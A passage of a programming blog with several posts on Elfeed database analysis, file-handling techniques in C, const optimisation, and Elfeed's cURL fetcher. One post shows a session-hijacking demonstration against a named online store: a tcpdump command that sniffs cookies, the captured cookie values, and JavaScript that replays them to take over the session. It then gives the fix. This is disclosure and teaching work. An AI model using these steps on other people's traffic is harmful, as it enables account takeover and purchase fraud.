null program

An Elfeed Database Analysis

The end of the month marks Elfeed’s third birthday. Surprising to nobody, it’s also been three years of heavy, daily use by me. While I’ve used Elfeed concurrently on a number of different machines over this period, I’ve managed to keep an Elfeed database index with a lineage going all the way back to the initial development stages, before the announcement. It’s a large, organically-grown database that serves as a daily performance stress test. Hopefully this means I’m one of the first people to have trouble if an invisible threshold is ever exceeded.

I’m also the sort of person who gets excited when I come across an interesting dataset, and I have this gem sitting right in front of me. So a couple of days ago I pushed a new Elfeed function, elfeed-csv-export, which exports a database index into three CSV files. These are intended to serve as three tables in a SQL database, exposing the database to interesting relational queries and joins. Entry content (HTML, etc.) has always been considered volatile, so this is not exported. The export function isn’t interactive (yet?), so if you want to generate your own you’ll need to (require 'elfeed-csv) and evaluate it yourself.

All the source code for performing the analysis below on your own database can be found here:

The three exported tables are feeds, entries, and tags. Here are the corresponding columns (optional CSV header) for each:

url, title, canonical-url, author
id, feed, title, link, date
entry, feed, tag

And here’s the SQLite schema I’m using for these tables:

CREATE TABLE feeds (
    url TEXT PRIMARY KEY,
    title TEXT,
    canonical_url TEXT,
    author TEXT
);

CREATE TABLE entries (
    id TEXT NOT NULL,
    feed TEXT NOT NULL REFERENCES feeds (url),
    title TEXT,
    link TEXT NOT NULL,
    date REAL NOT NULL,
    PRIMARY KEY (id, feed)
);

CREATE TABLE tags (
    entry TEXT NOT NULL,
    feed TEXT NOT NULL,
    tag TEXT NOT NULL,
    FOREIGN KEY (entry, feed) REFERENCES entries (id, feed)
);

Web authors are notoriously awful at picking actually-unique entry IDs, even when using the smarter option, Atom. I still simply don’t trust that entry IDs are unique, so, as usual, I’ve qualified them by their source feed URL, hence the primary key on both columns in entries.

At this point I wish I had collected a lot more information. If I were to start fresh today, Elfeed’s database schema would not only fully match Atom’s schema, but also exceed it with additional logging:

I may start tracking some of these. If I don’t, I’ll be kicking myself three years from now when I look at this again.

A look at my index

So just how big is my index? It’s 25MB uncompressed, 2.5MB compressed. I currently follow 117 feeds, but my index includes 43,821 entries from 309 feeds. These entries are marked with 53,360 tags from a set of 35 unique tags. Some of these datapoints are the result of temporarily debugging Elfeed issues and don’t represent content that I actually follow. I’m more careful these days to test in a temporary database as to avoid contamination. Some are duplicates due to feeds changing URLs over the years. Some are artifacts from old bugs. This all represents a bit of noise, but should be negligible. During my analysis I noticed some of these anomalies and took a moment to clean up obviously bogus data (weird dates, etc.), all by adjusting tags.

The first thing I wanted to know is the weekday frequency. A number of times I’ve blown entire Sundays working on Elfeed, and, as if to frustrate my testing, it’s not unusual for several hours to pass between new entries on Sundays. Is this just my perception or are Sundays really that slow?

Here’s my query. I’m using SQLite’s strftime to shift the result into my local time zone, Eastern Time. This time zone is the source, or close to the source, of a large amount of the content. This also automatically accounts for daylight savings time, which can’t be done with a simple divide and subtract.

SELECT tag,
       cast(strftime('%w', date, 'unixepoch', 'localtime') AS INT) AS day,
       count(id) AS count
FROM entries
JOIN tags ON tags.entry = entries.id AND tags.feed = entries.feed
GROUP BY tag, day;

The most frequent tag (13,666 appearances) is “youtube”, which marks every YouTube video, and I’ll use gnuplot to visualize it. The input “file” is actually a command since gnuplot is poor at filtering data itself, especially for histograms.

plot '< grep ^youtube, weekdays.csv' using 2:3 with boxes

Wow, things do quiet down dramatically on weekends! From the glass-half-full perspective, this gives me a chance to catch up when I inevitably fall behind on these videos during the week.

The same is basically true for other types of content, including “comic” (12,465 entries) and “blog” (7,505 entries).

However, “emacs” (2,404 entries) is a different story. It doesn’t slow down on the weekend, but Emacs users sure love to talk about Emacs on Mondays. In my own index, this spike largely comes from Planet Emacsen. Initially I thought maybe this was an artifact of Planet Emacsen’s date handling — i.e. perhaps it does a big fetch on Mondays and groups up the dates — but I double checked: they pass the date directly through from the original articles.

Conclusion: Emacs users love Mondays. Or maybe they hate Mondays and talk about Emacs as an escape.

I can reuse the same query to look at different time scales. When during the day do entries appear? Adjusting the time zone here becomes a lot more important.

SELECT tag,
       cast(strftime('%H', date, 'unixepoch', 'localtime') AS INT) AS hour,
       count(id) AS count
FROM entries
JOIN tags ON tags.entry = entries.id AND tags.feed = entries.feed
GROUP BY tag, hour;

Emacs bloggers tend to follow a nice Eastern Time sleeping schedule. (I wonder how Vim bloggers compare, since, as an Emacs user, I naturally assume Vim users’ schedules are as undisciplined as their bathing habits.) However, this also might be prolific the Irreal breaking the curve.

The YouTube channels I follow are a bit more erratic, but there’s still a big drop in the early morning and a spike in the early afternoon. It’s unclear if the timestamp published in the feed is the upload time or the publication time. This would make a difference in the result (e.g. overnight video uploads).

Do you suppose there’s a slow month?

SELECT tag,
       cast(strftime('%m', date, 'unixepoch', 'localtime') AS INT) AS day,
       count(id) AS count
FROM entries
JOIN tags ON tags.entry = entries.id AND tags.feed = entries.feed
GROUP BY tag, day;

December is a big drop across all tags, probably for the holidays. Both “comic” and “blog” also have an interesting drop in August. For brevity, I’ll only show one. This might be partially due my not waiting until the end of this month for this analysis, since there are only 2.5 Augusts in my 3-year dataset.

Unfortunately the timestamp is the only direct numerical quantity in the data. So far I’ve been binning data points and counting to get a second numerical quantity. Everything else is text, so I’ll need to get more creative to find other interesting relationships.

So let’s have a look a the lengths of entry titles.

SELECT tag,
       length(title) AS length,
       count(*) AS count
FROM entries
JOIN tags ON tags.entry = entries.id AND tags.feed = entries.feed
GROUP BY tag, length
ORDER BY length;

The shortest are the webcomics. I’ve complained about poor webcomic titles before, so this isn’t surprising. The spikes are from comics that follow a strict (uncreative) title format.

Emacs article titles follow a nice distribution. You can tell these are programmers because so many titles are exactly 32 characters long. Picking this number is such a natural instinct that we aren’t even aware of it. Or maybe all their database schemas have VARCHAR(32) title columns?

Blogs in general follow a nice distribution. The big spike is from the Dwarf Fortress development blog, which follows a strict date format.

The longest on average are YouTube videos. This is largely due to the kinds of videos I watch (“Let’s Play” videos), which tend to have long, predictable names.

And finally, here’s the most interesting-looking graph of them all.

SELECT ((date - 4*60*60) % (24*60*60)) / (60*60) AS day_time,
       length(title) AS length
FROM entries
JOIN tags ON tags.entry = entries.id AND tags.feed = entries.feed;

This is the title length versus time of day (not binned). Each point is one of the 53,360 posts.

set style fill transparent solid 0.25 noborder
set style circle radius 0.04
plot 'length-vs-daytime.csv' using 1:2 with circles

(This is a good one to follow through to the full size image.)

Again, all Eastern Time since I’m self-centered like that. Vertical lines are authors rounding their post dates to the hour. Horizontal lines are the length spikes from above, such as the line of entries at title length 10 in the evening (Dwarf Fortress blog). There’s a the mid-day cloud of entries of various title lengths, with the shortest title cloud around mid-morning. That’s probably when many of the webcomics come up.

Additional analysis could look further at textual content, beyond simply length, in some quantitative way (n-grams? soundex?). But mostly I really need to keep track of more data!

tags: [ emacs elfeed ]

Automatic Deletion of Incomplete Output Files

Conventionally, a program that creates an output file will delete its incomplete output should an error occur while writing the file. It’s risky to leave behind a file that the user may rightfully confuse for a valid file. They might not have noticed the error.

For example, compression programs such as gzip, bzip2, and xz when given a compressed file as an argument will create a new file with the compression extension removed. They write to this file as the compressed input is being processed. If the compressed stream contains an error in the middle, the partially-completed output is removed.

There are exceptions of course, such as programs that download files over a network. The partial result has value, especially if the transfer can be continued from where it left off. The convention is to append another extension, such as “.part”, to indicate a partial output.

The straightforward solution is to always delete the file as part of error handling. A non-interactive program would report the error on standard error, delete the file, and exit with an error code. However, there are at least two situations where error handling would be unable to operate: unhandled signals (usually including a segmentation fault) and power failures. A partial or corrupted output file will be left behind, possibly looking like a valid file.

A common, more complex approach is to name the file differently from its final name while being written. If written successfully, the completed file is renamed into place. This is already required for durable replacement, so it’s basically free for many applications. In the worst case, where the program is unable to clean up, the obviously incomplete file is left behind only wasting space.

Looking to be more robust, I had the following misguided idea: Rely completely on the operating system to perform cleanup in the case of a failure. Initially the file would be configured to be automatically deleted when the final handle is closed. This takes care of all abnormal exits, and possibly even power failures. The program can just exit on error without deleting the file. Once written successfully, the automatic-delete indicator is cleared so that the file survives.

The target application for this technique supports both Linux and Windows, so I would need to figure it out for both systems. On Windows, there’s the flag FILE_FLAG_DELETE_ON_CLOSE. I’d just need to find a way to clear it. On POSIX, file would be unlinked while being written, and linked into the filesystem on success. The latter turns out to be a lot harder than I expected.

Solution for Windows

I’ll start with Windows since the technique actually works fairly well here — ignoring the usual, dumb Win32 filesystem caveats. This is a little surprising, since it’s usually Win32 that makes these things far more difficult than they should be.

The primary Win32 function for opening and creating files is CreateFile. There are many options, but the key is FILE_FLAG_DELETE_ON_CLOSE. Here’s how an application might typically open a file for output.

DWORD access = GENERIC_WRITE;
DWORD create = CREATE_ALWAYS;
DWORD flags = FILE_FLAG_DELETE_ON_CLOSE;
HANDLE f = CreateFile("out.tmp", access, 0, 0, create, flags, 0);

This special flag asks Windows to delete the file as soon as the last handle to to file object is closed. Notice I said file object, not file, since these are different things. The catch: This flag is a property of the file object, not the file, and cannot be removed.

However, the solution is simple. Create a new link to the file so that it survives deletion. This even works for files residing on a network shares.

CreateHardLink("out", "out.tmp", 0);
CloseHandle(f);  // deletes out.tmp file

The gotcha is that the underlying filesystem must be NTFS. FAT32 doesn’t support hard links. Unfortunately, since FAT32 remains the least common denominator and is still widely used for removable media, depending on the application, your users may expect support for saving files to FAT32. A workaround is probably required.

Solution for Linux

This is where things really fall apart. It’s just barely possible on Linux, it’s messy, and it’s not portable anywhere else. There’s no way to do this for POSIX in general.

My initial thought was to create a file then unlink it. Unlike the situation on Windows, files can be unlinked while they’re currently open by a process. These files are finally deleted when the last file descriptor (the last reference) is closed. Unfortunately, using unlink(2) to remove the last link to a file prevents that file from being linked again.

Instead, the solution is to use the relatively new (since Linux 3.11), Linux-specific O_TMPFILE flag when creating the file. Instead of a filename, this variation of open(2) takes a directory and creates an unnamed, temporary file in it. These files are special in that they’re permitted to be given a name in the filesystem at some future point.

For this example, I’ll assume the output is relative to the current working directory. If it’s not, you’ll need to open an additional file descriptor for the parent directory, and also use openat(2) to avoid possible race conditions (since paths can change from under you). The number of ways this can fail is already rapidly multiplying.

int fd = open(".", O_TMPFILE|O_WRONLY, 0600);

The catch is that only a handful of filesystems support O_TMPFILE. It’s like the FAT32 problem above, but worse. You could easily end up in a situation where it’s not supported, and will almost certainly require a workaround.

Linking a file from a file descriptor is where things get messier. The file descriptor must be linked with linkat(2) from its name on the /proc virtual filesystem, constructed as a string. The following snippet comes straight from the Linux open(2) manpage.

char buf[64];
sprintf(buf, "/proc/self/fd/%d", fd);
linkat(AT_FDCWD, buf, AT_FDCWD, "out", AT_SYMLINK_FOLLOW);

Even on Linux, /proc isn’t always available, such as within a chroot or a container, so this part can fail as well. In theory there’s a way to do this with the Linux-specific AT_EMPTY_PATH and avoid /proc, but I couldn’t get it to work.

// Note: this doesn't actually work for me.
linkat(fd, "", AT_FDCWD, "out", AT_EMPTY_PATH);

Given the poor portability (even within Linux), the number of ways this can go wrong, and that a workaround is definitely needed anyway, I’d say this technique is worthless. I’m going to stick with the tried-and-true approach for this one.

tags: [ c cpp win32 linux ]

Appending to a File from Multiple Processes

Suppose you have multiple processes appending output to the same file without explicit synchronization. These processes might be working in parallel on different parts of the same problem, or these might be threads blocked individually reading different external inputs. There are two concerns that come into play:

1) The append must be atomic such that it doesn’t clobber previous appends by other threads and processes. For example, suppose a write requires two separate operations: first moving the file pointer to the end of the file, then performing the write. There would be a race condition should another process or thread intervene in between with its own write.

2) The output will be interleaved. The primary solution is to design the data format as atomic records, where the ordering of records is unimportant — like rows in a relational database. This could be as simple as a text file with each line as a record. The concern is then ensuring records are written atomically.

This article discusses processes, but the same applies to threads when directly dealing with file descriptors.

Appending

The first concern is solved by the operating system, with one caveat. On POSIX systems, opening a file with the O_APPEND flag will guarantee that writes always safely append.

If the O_APPEND flag of the file status flags is set, the file offset shall be set to the end of the file prior to each write and no intervening file modification operation shall occur between changing the file offset and the write operation.

However, this says nothing about interleaving. Two processes successfully appending to the same file will result in all their bytes in the file in order, but not necessarily contiguously.

The caveat is that not all filesystems are POSIX-compatible. Two famous examples are NFS and the Hadoop Distributed File System (HDFS). On these networked filesystems, appends are simulated and subject to race conditions.

On POSIX systems, fopen(3) with the a flag will use O_APPEND, so you don’t necessarily need to use open(2). On Linux this can be verified for any language’s standard library with strace.

#include <stdio.h>

int main(void)
{
    fopen("/dev/null", "a");
    return 0;
}
$ strace -e open ./a.out
open("/dev/null", O_WRONLY|O_CREAT|O_APPEND, 0666) = 3

For Win32, the equivalent is the FILE_APPEND_DATA access right, and similarly only applies to “local files.”

Interleaving and Pipes

The interleaving problem has two layers, and gets more complicated the more correct you want to be. Let’s start with pipes.

On POSIX, a pipe is unseekable and doesn’t have a file position, so appends are the only kind of write possible. When writing to a pipe (or FIFO), writes less than the system-defined PIPE_BUF are guaranteed to be atomic and non-interleaving.

Write requests of PIPE_BUF bytes or less shall not be interleaved with data from other processes doing writes on the same pipe. Writes of greater than PIPE_BUF bytes may have data interleaved, on arbitrary boundaries, with writes by other processes, […]

The minimum value for PIPE_BUF for POSIX systems is 512 bytes. On Linux it’s 4kB, and on other systems it’s as high as 32kB. As long as each record is less than 512 bytes, a simple write(2) will due. None of this depends on a filesystem since no files are involved.

If more than PIPE_BUF bytes isn’t enough, the POSIX writev(2) can be used to atomically write up to IOV_MAX buffers of PIPE_BUF bytes. The minimum value for IOV_MAX is 16, but is typically 1024. This means the maximum safe atomic write size for pipes — and therefore the largest record size — for a perfectly portable program is 8kB (16✕512). On Linux it’s 4MB.

That’s all at the system call level. There’s another layer to contend with: buffered I/O in your language’s standard library. Your program may pass data in appropriately-sized pieces for atomic writes to the I/O library, but it may be undoing your hard work, concatenating all these writes into a buffer, splitting apart your records. For this part of the article, I’ll focus on single-threaded C programs.

Suppose you’re writing a simple space-separated format with one line per record.

int foo, bar;
float baz;
while (condition) {
    // ...
    printf("%d %d %f\n", foo, bar, baz);
}

Whether or not this works depends on how stdout is buffered. C standard library streams (FILE *) have three buffering modes: unbuffered, line buffered, and fully buffered. Buffering is configured through setbuf(3) and setvbuf(3), and the initial buffering state of a stream depends on various factors. For buffered streams, the default buffer is at least BUFSIZ bytes, itself at least 256 (C99 §7.19.2¶7). Note: threads share this buffer.

Since each record in the above program easily fits inside 256 bytes, if stdout is a line buffered pipe then this program will interleave correctly on any POSIX system without further changes.

If instead your output is comma-separated values (CSV) and your records may contain new line characters, there are two approaches. In each, the record must still be no larger than PIPE_BUF bytes.

If your situation is more complicated than this, you’ll probably have to bypass your standard library buffered I/O and call write(2) or writev(2) yourself.

Practical Application

If interleaving writes to a pipe stdout sounds contrived, here’s the real life scenario: GNU xargs with its --max-procs (-P) option to process inputs in parallel.

xargs -n1 -P$(nproc) myprogram < inputs.txt | cat > outputs.csv

The | cat ensures the output of each myprogram process is connected to the same pipe rather than to the same file.

A non-portable alternative to | cat, especially if you’re dispatching processes and threads yourself, is the splice(2) system call on Linux. It efficiently moves the output from the pipe to the output file without an intermediate copy to userspace. GNU Coreutils’ cat doesn’t use this.

Win32 Pipes

On Win32, anonymous pipes have no semantics regarding interleaving. Named pipes have per-client buffers that prevent interleaving. However, the pipe buffer size is unspecified, and requesting a particular size is only advisory, so it comes down to trial and error, though the unstated limits should be comparatively generous.

Interleaving and Files

Suppose instead of a pipe we have an O_APPEND file on POSIX. Common wisdom states that the same PIPE_BUF atomic write rule applies. While this often works, especially on Linux, this is not correct. The POSIX specification doesn’t require it and there are systems where it doesn’t work.

If you know the particular limits of your operating system and filesystem, and you don’t care much about portability, then maybe you can get away with interleaving appends. For full portability, pipes are required.

On Win32, writes on local files up to the underlying drive’s sector size (typically 512 bytes to 4kB) are atomic. Otherwise the only options are deprecated Transactional NTFS (TxF), or manually synchronizing your writes. All in all, it’s going to take more work to get correct.

Conclusion

My true use case for mucking around with clean, atomic appends is to compute giant CSV tables in parallel, with the intention of later loading into a SQL database (i.e. SQLite) for analysis. A more robust and traditional approach would be to write results directly into the database as they’re computed. But I like the platform-neutral intermediate CSV files — good for archival and sharing — and the simplicity of programs generating the data — concerned only with atomic write semantics rather than calling into a particular SQL database API.

tags: [ c linux posix win32 ]

Const and Optimization in C

Today there was a question on /r/C_Programming about the effect of C’s const on optimization. Variations of this question have been asked many times over the past two decades. Personally, I blame naming of const.

Given this program:

void foo(const int *);

int
bar(void)
{
    int x = 0;
    int y = 0;
    for (int i = 0; i < 10; i++) {
        foo(&x);
        y += x;  // this load not optimized out
    }
    return y;
}

The function foo takes a pointer to const, which is a promise from the author of foo that it won’t modify the value of x. Given this information, it would seem the compiler may assume x is always zero, and therefore y is always zero.

However, inspecting the assembly output of several different compilers shows that x is loaded each time around the loop. Here’s gcc 4.9.2 at -O3, with annotations.

bar:
     push   rbp
     push   rbx
     xor    ebp, ebp              ; y = 0
     mov    ebx, 0xa              ; loop variable i
     sub    rsp, 0x18             ; allocate x
     mov    dword [rsp+0xc], 0    ; x = 0

.L0: lea    rdi, [rsp+0xc]        ; compute &x
     call   foo
     add    ebp, dword [rsp+0xc]  ; y += x  (not optmized?)
     sub    ebx, 1
     jne    .L0

     add    rsp, 0x18             ; deallocate x
     mov    eax, ebp              ; return y
     pop    rbx
     pop    rbp
     ret

The output of clang 3.5 (with -fno-unroll-loops) is the same, except ebp and ebx are swapped, and the computation of &x is hoisted out of the loop, into r14.

Are both compilers failing to take advantage of this useful information? Wouldn’t it be undefined behavior for foo to modify x? Surprisingly, the answer is no. In this situation, this would be a perfectly legal definition of foo.

void
foo(const int *readonly_x)
{
    int *x = (int *)readonly_x;  // cast away const
    (*x)++;
}

The key thing to remember is that const doesn’t mean constant. Chalk it up as a misnomer. It’s not an optimization tool. It’s there to inform programmers — not the compiler — as a tool to catch a certain class of mistakes at compile time. I like it in APIs because it communicates how a function will use certain arguments, or how the caller is expected to handle returned pointers. It’s usually not strong enough for the compiler to change its behavior.

Despite what I just said, occasionally the compiler can take advantage of const for optimization. The C99 specification, in §6.7.3¶5, has one sentence just for this:

If an attempt is made to modify an object defined with a const-qualified type through use of an lvalue with non-const-qualified type, the behavior is undefined.

The original x wasn’t const-qualified, so this rule didn’t apply. And there aren’t any rules against casting away const to modify an object that isn’t itself const. This means the above (mis)behavior of foo isn’t undefined behavior for this call. Notice how the undefined-ness of foo depends on how it was called.

With one tiny tweak to bar, I can make this rule apply, allowing the optimizer do some work on it.

    const int x = 0;

The compiler may now assume that foo modifying x is undefined behavior, therefore it never happens. For better or worse, this is a major part of how a C optimizer reasons about your programs. The compiler is free to assume x never changes, allowing it to optimize out both the per-iteration load and y.

bar:
     push   rbx
     mov    ebx, 0xa            ; loop variable i
     sub    rsp, 0x10           ; allocate x
     mov    dword [rsp+0xc], 0  ; x = 0

.L0: lea    rdi, [rsp+0xc]      ; compute &x
     call   foo
     sub    ebx, 1
     jne    .L0

     add    rsp, 0x10           ; deallocate x
     xor    eax, eax            ; return 0
     pop    rbx
     ret

The load disappears, y is gone, and the function always returns zero.

Curiously, the specification allows the compiler to go even further. It’s permitted to allocate x somewhere off the stack, even in read-only memory. For example, it could perform a transformation like this:

static int __x = 0;

int
bar(void)
{
    for (int i = 0; i < 10; i++)
        foo(&__x);
    return 0;
}

Or on x86-64 (-fPIC, small code model), where we can see a few more instructions shaved off:

section .rodata
x:   dd     0

section .text
bar:
     push   rbx
     mov    ebx, 0xa        ; loop variable i

.L0: lea    rdi, [rel x]    ; compute &x
     call   foo
     sub    ebx, 1
     jne    .L0

     xor    eax, eax        ; return 0
     pop    rbx
     ret

Neither clang nor gcc took it this far, perhaps because it’s more disruptive to badly-behaved programs.

Even with this special const rule, only use const for yourself and for your fellow human programmers. Let the optimizer reason for itself about what is constant and what is not.

tags: [ c x86 ]

Stealing Session Cookies with Tcpdump

My wife was shopping online for running shoes when she got this classic Firefox pop-up.

These days this is usually just a server misconfiguration annoyance. However, she was logged into an account, which included a virtual shopping cart and associated credit card payment options, meaning actual sensitive information would be at risk.

The main culprit was the website’s search feature, which wasn’t transmitted over HTTPS. There’s an HTTPS version of the search (which I found manually), but searches aren’t directed there. This means it’s also vulnerable to SSL stripping.

Fortunately Firefox warns about the issue and requires a positive response before continuing. Neither Chrome nor Internet Explorer get this right. Both transmit session cookies in the clear without warning, then subtly mention it after the fact. She may not have even noticed the problem (and then asked me about it) if not for that pop-up.

I contacted the website’s technical support two weeks ago and they never responded, nor did they fix any of their issues, so for now you can see this all for yourself.

Finding the session cookies

To prove to myself that this whole situation was really as bad as it looked, I decided to steal her session cookie and use it to manipulate her shopping cart. First I hit F12 in her browser to peek at the network headers. Perhaps nothing important was actually sent in the clear.

The session cookie (red box) was definitely sent in the request. I only need to catch it on the network. That’s an easy job for tcpdump.

tcpdump -A -l dst www.roadrunnersports.com and dst port 80 | \
    grep "^Cookie: "

This command tells tcpdump to dump selected packet content as ASCII (-A). It also sets output to line-buffered so that I can see packets as soon as they arrive (-l). The filter will only match packets going out to this website and only on port 80 (HTTP), so I won’t see any extraneous noise (dst <addr> and dst port <port>). Finally, I crudely run that all through grep to see if any cookies fall out.

On the next insecure page load I get this (wrapped here for display) spilling many times into my terminal:

Cookie: JSESSIONID=99004F61A4ED162641DC36046AC81EAB.prd_rrs12; visitSo
  urce=Registered; RoadRunnerTestCookie=true; mobify-path=; __cy_d=09A
  78CC1-AF18-40BC-8752-B2372492EDE5; _cybskt=; _cycurrln=; wpCart=0; _
  up=1.2.387590744.1465699388; __distillery=a859d68_771ff435-d359-489a
  -bf1a-1e3dba9b8c10-db57323d1-79769fcf5b1b-fc6c; DYN_USER_ID=16328657
  52; DYN_USER_CONFIRM=575360a28413d508246fae6befe0e1f4

That’s a bingo! I massage this into a bit of JavaScript, go to the store page in my own browser, and dump it in the developer console. I don’t know which cookies are important, but that doesn’t matter. I take them all.

document.cookie = "Cookie: JSESSIONID=99004F61A4ED162641DC36046A" +
                  "C81EAB.prd_rrs12;";
document.cookie = "visitSource=Registered";
document.cookie = "RoadRunnerTestCookie=true";
document.cookie = "mobify-path=";
document.cookie = "__cy_d=09A78CC1-AF18-40BC-8752-B2372492EDE5";
document.cookie = "_cybskt=";
document.cookie = "_cycurrln=";
document.cookie = "wpCart=0";
document.cookie = "_up=1.2.387590744.1465699388";
document.cookie = "__distillery=a859d68_771ff435-d359-489a-bf1a-" +
                  "1e3dba9b8c10-db57323d1-79769fcf5b1b-fc6c";
document.cookie = "DYN_USER_ID=1632865752";
document.cookie = "DYN_USER_CONFIRM=575360a28413d508246fae6befe0e1f4";

Refresh the page and now I’m logged in. I can see what’s in the shopping cart. I can add and remove items. I can checkout and complete the order. My browser is as genuine as hers.

How to fix it

The quick and dirty thing to do is set the Secure and HttpOnly flags on all cookies. The first prevents cookies from being sent in the clear, where a passive observer might see them. The second prevents the JavaScript from accessing them, since an active attacker could inject their own JavaScript in the page. Customers would appear to be logged out on plain HTTP pages, which is confusing.

However, since this is an online store, there’s absolutely no excuse to be serving anything over plain HTTP. This just opens customers up to downgrade attacks. The long term solution, in addition to the cookie flags above, is to redirect all HTTP requests to HTTPS and never serve or request content over HTTP, especially not executable content like JavaScript.

tags: [ ]

Elfeed, cURL, and You

This morning I pushed out an important update to Elfeed, my web feed reader for Emacs. The update should be available in MELPA by the time you read this. Elfeed now has support for fetching feeds using a cURL through a curl inferior process. You’ll need the program in your PATH or configured through elfeed-curl-program-name.

I’ve been using it for a couple of days now, but, while I work out the remaining kinks, it’s disabled by default. So in addition to having cURL installed, you’ll need to set elfeed-use-curl to non-nil. Sometime soon it will be enabled by default whenever cURL is available. The original url-retrieve fetcher will remain in place for time time being. However, cURL may become a requirement someday.

Fetching with a curl inferior process has some huge advantages.

It’s much faster

The most obvious change is that you should experience a huge speedup on updates and better responsiveness during updates after the first cURL run. There are important two reasons:

Asynchronous DNS and TCP: Emacs 24 and earlier performs DNS queries synchronously even for asynchronous network processes. This is being fixed on some platforms (including Linux) in Emacs 25, but now we don’t have to wait.

On Windows it’s even worse: the TCP connection is also established synchronously. This is especially bad when fetching relatively small items such as feeds, because the DNS look-up and TCP handshake dominate the overall fetch time. It essentially makes the whole process synchronous.

Conditional GET: HTTP has two mechanism to avoid transmitting information that a client has previously fetched. One is the Last-Modified header delivered by the server with the content. When querying again later, the client echos the date back like a token in the If-Modified-Since header.

The second is the “entity tag,” an arbitrary server-selected token associated with each version of the content. The server delivers it along with the content in the ETag header, and the client hands it back later in the If-None-Match header, sort of like a cookie.

This is highly valuable for feeds because, unless the feed is particularly active, most of the time the feed hasn’t been updated since the last query. This avoids sending anything other hand a handful of headers each way. In Elfeed’s case, it means it doesn’t have to parse the same XML over and over again.

Both of these being outside of cURL’s scope, Elfeed has to manage conditional GET itself. I had no control over the HTTP headers until now, so I couldn’t take advantage of it. Emacs’ url-retrieve function allows for sending custom headers through dynamically binding url-request-extra-headers, but this isn’t available when calling url-queue-retrieve since the request itself is created asynchronously.

Both the ETag and Last-Modified values are stored in the database and persist across sessions. This is the reason the full speedup isn’t realized until the second fetch. The initial cURL fetch doesn’t have these values.

Fewer bugs

As mentioned previously, Emacs has a built-in URL retrieval library called url. The central function is url-retrieve which asynchronously fetches the content at an arbitrary URL (usually HTTP) and delivers the buffer and status to a callback when it’s ready. There’s also a queue front-end for it, url-queue-retrieve which limits the number of parallel connections. Elfeed hands this function a pile of feed URLs all at once and it fetches them N at a time.

Unfortunately both these functions are incredibly buggy. It’s been a thorn in my side for years.

Here’s what the interface looks like for both:

(url-retrieve URL CALLBACK &optional CBARGS SILENT INHIBIT-COOKIES)

It takes a URL and a callback. Seeing this, the sane, unsurprising expectation is the callback will be invoked exactly once for time url-retrieve was called. In any case where the request fails, it should report it through the callback. This is not the case. The callback may be invoked any number of times, including zero.

In this example, suppose you have a webserver on port 8080 that will return an HTTP 404 at the given URL. Below, I fire off 10 asynchronous requests in a row.

(defvar results ())
(dotimes (i 10)
  (url-retrieve "http://127.0.0.1:8081/404"
                (lambda (status) (push (cons i status) results))))

What would you guess is the length of results? It’s initially 0 before any requests complete and over time (a very short time) I would expect this to top out at 10. On Emacs 24, here’s the real answer:

(length results)
;; => 46

The same error is reported multiple times to the callback. At least the pattern is obvious.

(cl-count 0 results :key #'car)
;; => 9
(cl-count 1 results :key #'car)
;; => 8
(cl-count 2 results :key #'car)
;; => 7

(cl-count 9 results :key #'car)
;; => 1

Here’s another one, this time to the non-existent foo.example. The DNS query should never resolve.

(setf results ())
(dotimes (i 10)
  (url-retrieve "http://foo.example/"
                (lambda (status) (push (cons i status) results))))

What’s the length of results? This time it’s zero. Remember how DNS is synchronous? Because of this, DNS failures are reported synchronously as a signaled error. This gets a lot worse with url-queue-retrieve. Since the request is put off until later, DNS doesn’t fail until later, and you get neither a callback nor an error signal. This also puts the queue in a bad state and necessitated elfeed-unjam for manually clear it. This one should get fixed in Emacs 25 when DNS is asynchronous.

This last one assumes you don’t have anything listening on port 57432 (pulled out of nowhere) so that the connection fails.

(setf results ())
(dotimes (i 10)
  (url-retrieve "http://127.0.0.1:57432/"
                (lambda (status) (push (cons i status) results))))

On Linux, we finally get the sane result of 10. However, on Windows, it’s zero. The synchronous TCP connection will fail, signaling an error just like DNS failures. Not only is it broken, it’s broken in different ways on different platforms.

There are many more cases of callback weirdness which depend on the connection and HTTP session being in various states when thing go awry. These were just the easiest to demonstrate. By using cURL, I get to bypass this mess.

No more GnuTLS issues

At compile time, Emacs can optionally be linked against GnuTLS, giving it robust TLS support so long as the shared library is available. url-retrieve uses this for fetching HTTPS content. Unfortunately, this library is noisy and will occasionally echo non-informational messages in the minibuffer and in *Messages* that cannot be suppressed.

When not linked against GnuTLS, Emacs will instead run the GnuTLS command line program as an inferior process, just like Elfeed now does with cURL. Unfortunately this interface is very slow and frequently fails, basically preventing Elfeed from fetching HTTPS feeds. I suspect it’s in part due to an improper coding-system-for-read.

cURL handles all the TLS negotation itself, so both these problems disappear. The compile-time configuration doesn’t matter.

Windows is now supported

Emacs’ Windows networking code is so unstable, even in Emacs 25, that I couldn’t make any practical use of Elfeed on that platform. Even the Cygwin emacs-w32 version couldn’t cut it. It hard crashes Emacs every time I’ve tried to fetch feeds. Fortunately the inferior process code is a whole lot more stable, meaning fetching with cURL works great. As of today, you can now use Elfeed on Windows. The biggest obstable is getting cURL installed and configured.

Interface changes

With cURL, obviously the values of url-queue-timeout and url-queue-parallel-processes no longer have any meaning to Elfeed. If you set these for yourself, you should instead call the functions elfeed-set-timeout and elfeed-set-max-connections, which will do the appropriate thing depending on the value of elfeed-use-curl. Each also comes with a getter so you can query the current value.

The deprecated elfeed-max-connections has been removed.

Feed objects now have meta tags :etag, :last-modified, and :canonical-url. The latter can identify feeds that have been moved, though it needs a real UI.

See any bugs?

If you use Elfeed, grab the current update and give the cURL fetcher a shot. Please open a ticket if you find problems. Be sure to report your Emacs version, operating system, and cURL version.

As of this writing there’s just one thing missing compared to url-queue: connection reuse. cURL supports it, so I just need to code it up.

tags: [ emacs elfeed ]

Four Ways to Compile C for Windows

I primarily work on and develop for unix-like operating systems — Linux in particular. However, when it comes to desktop applications, most potential users are on Windows. Rather than develop on Windows, which I’d rather avoid, I’ll continue developing, testing, and debugging on Linux while keeping portability in mind. Unfortunately every option I’ve found for building Windows C programs has some significant limitations. These limitations advise my approach to portability and restrict the C language features used by the program for all platforms.

As of this writing I’ve identified four different practical ways to build C applications for Windows. This information will definitely become further and further out of date as this article ages, so if you’re visiting from the future take a moment to look at the date. Except for LLVM shaking things up recently, development tooling on unix-like systems has had the same basic form for the past 15 years (i.e. dominated by GCC). While Visual C++ has been around for more than two decades, the tooling on Windows has seen more churn by comparison.

